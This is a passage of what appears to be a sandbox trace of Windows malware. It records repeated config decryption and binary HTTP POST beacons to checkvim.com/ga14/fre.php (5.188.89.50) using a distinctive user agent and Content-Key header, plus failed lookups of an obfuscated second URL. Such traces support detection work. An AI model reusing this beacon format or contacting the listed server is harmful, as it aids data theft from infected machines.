pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0199.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.511] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0199.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.512] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.512] GetProcessHeap () returned 0x840000 [0199.512] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0199.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.514] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0199.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.515] CryptDestroyKey (hKey=0x87e470) returned 1 [0199.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0199.516] CryptReleaseContext (hProv=0x86f3e0, dwFlags=0x0) returned 1 [0199.516] GetProcessHeap () returned 0x840000 [0199.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0199.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.517] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0199.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.518] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0199.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0199.519] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0199.519] GetProcessHeap () returned 0x840000 [0199.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0199.519] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0199.531] GetProcessHeap () returned 0x840000 [0199.531] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0199.531] socket (af=2, type=1, protocol=6) returned 0x270 [0199.531] connect (s=0x270, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0199.606] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0199.606] GetProcessHeap () returned 0x840000 [0199.606] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff08 [0199.606] GetProcessHeap () returned 0x840000 [0199.606] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0199.608] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0199.609] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0199.609] GetProcessHeap () returned 0x840000 [0199.609] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0199.609] GetProcessHeap () returned 0x840000 [0199.610] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0199.610] GetProcessHeap () returned 0x840000 [0199.610] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0199.610] GetProcessHeap () returned 0x840000 [0199.610] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0199.611] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0199.612] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0199.612] GetProcessHeap () returned 0x840000 [0199.612] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87f010 [0199.612] GetProcessHeap () returned 0x840000 [0199.612] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0199.613] send (s=0x270, buf=0x87f010*, len=237, flags=0) returned 237 [0199.613] send (s=0x270, buf=0x87eb58*, len=159, flags=0) returned 159 [0199.613] GetProcessHeap () returned 0x840000 [0199.613] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0199.613] recv (in: s=0x270, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0199.980] GetProcessHeap () returned 0x840000 [0199.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0199.980] GetProcessHeap () returned 0x840000 [0199.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0199.980] GetProcessHeap () returned 0x840000 [0199.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0199.980] GetProcessHeap () returned 0x840000 [0199.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff08 | out: hHeap=0x840000) returned 1 [0199.980] closesocket (s=0x270) returned 0 [0199.981] GetProcessHeap () returned 0x840000 [0199.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0199.981] GetProcessHeap () returned 0x840000 [0199.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0199.981] GetProcessHeap () returned 0x840000 [0199.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0199.981] GetProcessHeap () returned 0x840000 [0199.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0199.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe68) returned 0x270 [0199.986] Sleep (dwMilliseconds=0xea60) [0210.036] GetProcessHeap () returned 0x840000 [0210.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0210.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.042] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0210.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.083] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0210.091] GetProcessHeap () returned 0x840000 [0210.091] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0210.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.092] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0210.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.093] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0210.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.094] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.094] GetProcessHeap () returned 0x840000 [0210.094] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0210.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.095] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0210.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.108] CryptDestroyKey (hKey=0x87e630) returned 1 [0210.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.111] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0210.111] GetProcessHeap () returned 0x840000 [0210.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0210.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.112] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.113] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.114] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.117] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.117] GetProcessHeap () returned 0x840000 [0210.117] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0210.122] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0210.147] GetProcessHeap () returned 0x840000 [0210.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0210.147] GetProcessHeap () returned 0x840000 [0210.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0210.147] GetProcessHeap () returned 0x840000 [0210.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0210.147] GetProcessHeap () returned 0x840000 [0210.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0210.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.148] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0210.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.156] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f4f0) returned 1 [0210.162] GetProcessHeap () returned 0x840000 [0210.162] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0210.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.166] CryptImportKey (in: hProv=0x86f4f0, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0210.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.167] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0210.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.168] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.168] GetProcessHeap () returned 0x840000 [0210.168] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0210.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.172] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0210.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.173] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0210.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.174] CryptReleaseContext (hProv=0x86f4f0, dwFlags=0x0) returned 1 [0210.174] GetProcessHeap () returned 0x840000 [0210.174] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0210.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.175] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0210.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.176] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0210.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.177] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0210.177] GetProcessHeap () returned 0x840000 [0210.177] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0210.177] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0210.180] GetProcessHeap () returned 0x840000 [0210.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0210.180] socket (af=2, type=1, protocol=6) returned 0x288 [0210.181] connect (s=0x288, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0210.247] FreeAddrInfoW (pAddrInfo=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0210.247] GetProcessHeap () returned 0x840000 [0210.247] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fd70 [0210.247] GetProcessHeap () returned 0x840000 [0210.247] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0210.248] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0210.249] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0210.249] GetProcessHeap () returned 0x840000 [0210.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0210.249] GetProcessHeap () returned 0x840000 [0210.249] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0210.249] GetProcessHeap () returned 0x840000 [0210.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0210.249] GetProcessHeap () returned 0x840000 [0210.249] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0210.250] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0210.251] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0210.251] GetProcessHeap () returned 0x840000 [0210.251] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87f010 [0210.251] GetProcessHeap () returned 0x840000 [0210.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0210.252] send (s=0x288, buf=0x87f010*, len=237, flags=0) returned 237 [0210.253] send (s=0x288, buf=0x87eb58*, len=159, flags=0) returned 159 [0210.253] GetProcessHeap () returned 0x840000 [0210.253] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0210.253] recv (in: s=0x288, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0210.596] GetProcessHeap () returned 0x840000 [0210.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0210.596] GetProcessHeap () returned 0x840000 [0210.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0210.596] GetProcessHeap () returned 0x840000 [0210.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0210.596] GetProcessHeap () returned 0x840000 [0210.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fd70 | out: hHeap=0x840000) returned 1 [0210.596] closesocket (s=0x288) returned 0 [0210.598] GetProcessHeap () returned 0x840000 [0210.598] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0210.598] GetProcessHeap () returned 0x840000 [0210.598] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0210.598] GetProcessHeap () returned 0x840000 [0210.598] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0210.598] GetProcessHeap () returned 0x840000 [0210.598] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0210.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xc6c) returned 0x288 [0210.599] Sleep (dwMilliseconds=0xea60) [0210.609] GetProcessHeap () returned 0x840000 [0210.609] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0210.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.610] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0210.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.616] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f468) returned 1 [0210.653] GetProcessHeap () returned 0x840000 [0210.653] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0210.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.654] CryptImportKey (in: hProv=0x86f468, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0210.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.655] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0210.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.656] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.656] GetProcessHeap () returned 0x840000 [0210.656] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0210.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.656] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0210.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.657] CryptDestroyKey (hKey=0x87e270) returned 1 [0210.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.658] CryptReleaseContext (hProv=0x86f468, dwFlags=0x0) returned 1 [0210.658] GetProcessHeap () returned 0x840000 [0210.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0210.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.659] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.659] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.660] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.661] GetProcessHeap () returned 0x840000 [0210.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0210.661] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0210.661] GetProcessHeap () returned 0x840000 [0210.661] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0210.661] GetProcessHeap () returned 0x840000 [0210.661] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0210.661] GetProcessHeap () returned 0x840000 [0210.661] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0210.661] GetProcessHeap () returned 0x840000 [0210.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0210.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.662] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0210.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.736] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0210.743] GetProcessHeap () returned 0x840000 [0210.743] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0210.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.744] CryptImportKey (in: hProv=0x86f820, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0210.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.745] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0210.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.746] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.746] GetProcessHeap () returned 0x840000 [0210.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0210.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.748] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0210.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.749] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0210.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0210.750] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0210.750] GetProcessHeap () returned 0x840000 [0210.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0210.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.751] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0210.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.752] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0210.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.753] StrStrA 